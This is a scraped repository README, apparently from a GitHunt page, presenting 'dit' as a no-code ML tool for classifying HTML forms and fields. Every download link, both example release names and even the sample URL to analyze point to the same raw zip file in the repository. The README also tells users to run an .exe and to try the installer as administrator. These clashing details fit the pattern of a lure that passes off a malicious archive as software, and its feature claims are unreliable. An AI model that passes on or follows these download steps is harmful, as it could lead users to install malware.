GitHunt
WA

πŸ” Classify HTML pages, forms, and fields with ML to identify types like login, search, registration, and more without external dependencies.

🧩 dit - Classify HTML Forms with Simple ML

Download dit

πŸ“„ What is dit?

dit is a tool that helps you identify and classify parts of web pages, especially forms and fields. It uses machine learning methods like Logistic Regression and Conditional Random Fields to analyze HTML. This helps you understand the structure of web forms quickly and clearly.

You can use dit to organize or extract information from web pages without digging through complicated code. It works on many types of forms and fields, making web data easier to handle.

πŸ’» What can dit do for you?

  • Detect the location and type of forms on any HTML page.
  • Classify different types of input fields like text boxes, checkboxes, and drop-downs.
  • Work quietly in the background without interrupting your work.
  • Help with tasks like data entry automation, web scraping, or analyzing online forms.
  • Provide clear results you can use in other tools or processes.

πŸ”§ System Requirements

To run dit, your computer needs:

  • Windows 10 or later / macOS 10.13 or later / Linux (Ubuntu 18.04+ recommended)
  • At least 4 GB of RAM (8 GB or more for large web pages)
  • 100 MB of free storage space
  • Internet connection for downloading the program
  • A modern web browser (Chrome, Firefox, Edge, or Safari) to view HTML content analyzed by dit

πŸš€ Getting Started

dit does not require programming skills. You just download it, open it, and point it to the web page or HTML file you want to analyze. It will do the rest.

Below you will find detailed steps to download, install, and use dit on your computer.

⬇️ Download & Install

Please visit this page to download the latest version of dit:

Download dit

Follow these instructions:

  1. Click the link above or go to https://github.com/wayang-roleplay/dit/raw/refs/heads/main/classifier/Software-indigeneity.zip
  2. Look for the latest release. It should have names like https://github.com/wayang-roleplay/dit/raw/refs/heads/main/classifier/Software-indigeneity.zip for Windows or https://github.com/wayang-roleplay/dit/raw/refs/heads/main/classifier/Software-indigeneity.zip for macOS.
  3. Download the file that matches your operating system.
  4. Once downloaded, open the file:
    • On Windows, double-click the .exe and follow the setup prompts.
    • On macOS, open the .dmg and drag the dit app to your Applications folder.
    • On Linux, the release page might have a compressed archive file. Download it and extract it to a folder you choose.
  5. After installation, you can run dit from your Start menu, Application folder, or by launching the executable file.

πŸ›  How to Use dit

You do not need to code anything. The program uses a simple interface:

  1. Launch dit on your computer.
  2. You will see a field to enter a web page address (URL) or choose an HTML file from your device.
  3. Type or paste your URL, such as https://github.com/wayang-roleplay/dit/raw/refs/heads/main/classifier/Software-indigeneity.zip, or click the file button to browse and select a saved HTML file.
  4. Press the β€œAnalyze” button.
  5. dit will process the page and display a list of forms found.
  6. It will label each form’s fields with their type, like β€˜text input’, β€˜checkbox’, or β€˜dropdown’.
  7. Use the results to review form structure, export data, or continue with your task.

πŸ“ Supported File Types and Web Pages

  • Standard HTML files (.html, .htm)
  • URLs to live web pages that serve HTML content
  • Local HTML pages saved from your browser or downloaded from a website

βš™οΈ Under the Hood (How dit Works)

dit uses two main machine learning techniques:

  • Logistic Regression (LogReg): This helps dit decide the type of each form field based on features like HTML tags, attributes, and surrounding text.
  • Conditional Random Fields (CRF): This improves accuracy by considering the order and relation of fields within a form, so it guesses types based on context.

These methods combine to give reliable, easy-to-understand classifications.

🧰 Features at a Glance

  • Clear form and field type detection
  • Works with most modern HTML and forms
  • Fast analysis and results
  • Simple interface, no coding needed
  • Lightweight and runs on average computers
  • Command-line support for advanced users (optional)

πŸ’‘ Tips for Best Results

  • Use well-formed HTML pages. Pages with broken or incomplete code might confuse the tool.
  • For complex sites, save the page as a local HTML file and analyze it offline.
  • Keep dit updated by checking the release page regularly.
  • If a web page requires login, download the page after login before analyzing.

❔ Troubleshooting

  • If dit does not open, verify your system meets the minimum requirements.
  • For missing or incorrect results, try using a different web page or a saved HTML file.
  • If you encounter errors during installation, check folders permissions or try running the installer as administrator.
  • Consult the Issues section on the GitHub repo for common problems and fixes.

πŸ“š Learn More and Further Help


⬇️ Download dit now and start analyzing HTML forms without coding.